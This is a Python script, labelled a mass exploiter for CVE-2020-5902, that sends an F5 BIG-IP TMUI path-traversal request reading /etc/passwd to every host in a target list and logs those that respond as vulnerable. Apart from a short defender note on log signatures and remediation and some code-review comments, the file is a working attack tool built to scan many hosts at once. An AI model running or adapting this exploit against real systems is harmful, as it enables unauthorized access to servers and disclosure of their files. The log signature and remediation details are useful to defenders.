CVE-2020-5902-mass-exploiter.py
import argparse
import aiohttp
import asyncio
from termcolor import colored
'''
Coded by d4rkstat1c..
CVE-2020-5902-mass-exploiter.
Use for educational purposes.
Shoutz to s1ege, neckros, anonxoxtn, 3turr.
usage: mass.py -l list.txt -w <workers amount>
'''
async def work(session, target):
    """Send one CVE-2020-5902 check request to ``target`` and record the outcome.

    The request is a GET to ``target`` with a fixed TMUI path appended. The
    response is classified by status code and by whether the body contains a
    passwd-file marker. Any HTTP 200 result is appended to ``result.txt``.

    Args:
        session: HTTP client session used to issue the GET.
        target: Base URL string; the fixed path is concatenated to it as-is.
    """
    # Defender note: this request is easy to spot in access logs for the
    # management interface. It is a GET under /tmui/ whose path contains the
    # "..;/" segment and a fileName= query parameter. Remediation is the vendor
    # fix for CVE-2020-5902 plus keeping TMUI unreachable from untrusted networks.
    payload = '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
    try:
        async with session.get(target+payload, timeout=10) as r:
            if r.status == 200:
                # NOTE(review): the handle is opened before the body is read and is
                # only closed on the normal path; if r.text() raises, it is left open.
                f = open('result.txt', 'a')
                if 'root:x:0:0:root' in await r.text():
                    print(colored('[+] {0} is VULNERABLE!!!\n'.format(target), 'green'))
                    result = ' <- VULNERABLE'
                else:
                    # NOTE(review): every other 200 response lands here, including a
                    # generic page from a host that is not affected. A "POSSIBLY
                    # VULNERABLE" entry is therefore not evidence of exposure.
                    print(colored('[+] {0} may be vulnerable, check manually!\n'.format(target), 'yellow'))
                    result = ' <- POSSIBLY VULNERABLE'
                f.write(target+result+'\n')
                f.close()
            else:
                print(colored('[-] {0} Exploit failed.\n'.format(target), 'red'))
    # NOTE(review): the bare except reports every failure in the block above as a
    # network error, including decoding and file-write errors.
    except:
        print(colored('[-] {0} Network/Connection Error.'.format(target), 'blue'))
async def create_workers(targets):
    """Run ``work`` concurrently for every entry in ``targets`` on one shared session.

    Args:
        targets: Iterable of target strings; each is stripped of surrounding
            whitespace before being passed to ``work``.
    """
    # ssl=False disables TLS certificate verification for every request made
    # through this connector, so the identity of the responding host is unchecked.
    async with aiohttp.TCPConnector(ssl=False) as connector:
        async with aiohttp.ClientSession(connector=connector) as session:
            # One coroutine per target, all awaited together; gather returns
            # once every coroutine in this batch has finished.
            await asyncio.gather(*[work(session, target.strip()) for target in targets])
def read_file(filename):
    """Return the lines of ``filename`` as a list, line endings included."""
    with open(filename, "r") as handle:
        lines = handle.readlines()
    return lines
def main():
    """Parse the command line and process the target list in batches.

    Reads the target file given with ``-l``, then runs ``create_workers`` over
    the whole list when it holds no more entries than the ``-w`` value, or
    otherwise over consecutive slices of that size. Each slice runs to
    completion before the next one starts.
    """
    parser = argparse.ArgumentParser(description='F5 Big-IP CVE-2020-5902 mass exploiter')
    parser.add_argument('-l', '--list', type=str, required=True,
                        help='Specify the list of targets.')
    parser.add_argument('-w', '--workers', type=str, required=True,
                        help='Specify the max amount of workers.')
    args = parser.parse_args()
    targets = read_file(args.list)
    # NOTE(review): --workers is parsed as a string and converted here, so a
    # non-numeric value raises ValueError instead of an argparse usage error.
    max_workers = int(args.workers)
    list_len = len(targets)
    if max_workers >= list_len:
        asyncio.get_event_loop().run_until_complete(create_workers(targets))
    else:
        # NOTE(review): max_workers is used as the range step. With a non-empty
        # list, 0 makes range() raise ValueError and a negative value gives an
        # empty range, so nothing runs.
        for i in range(0, list_len, max_workers):
            target_chunk = targets[i:i+max_workers]
            asyncio.get_event_loop().run_until_complete(create_workers(target_chunk))
# Run the command-line entry point only when executed as a script, not on import.
if __name__ == '__main__':
    main()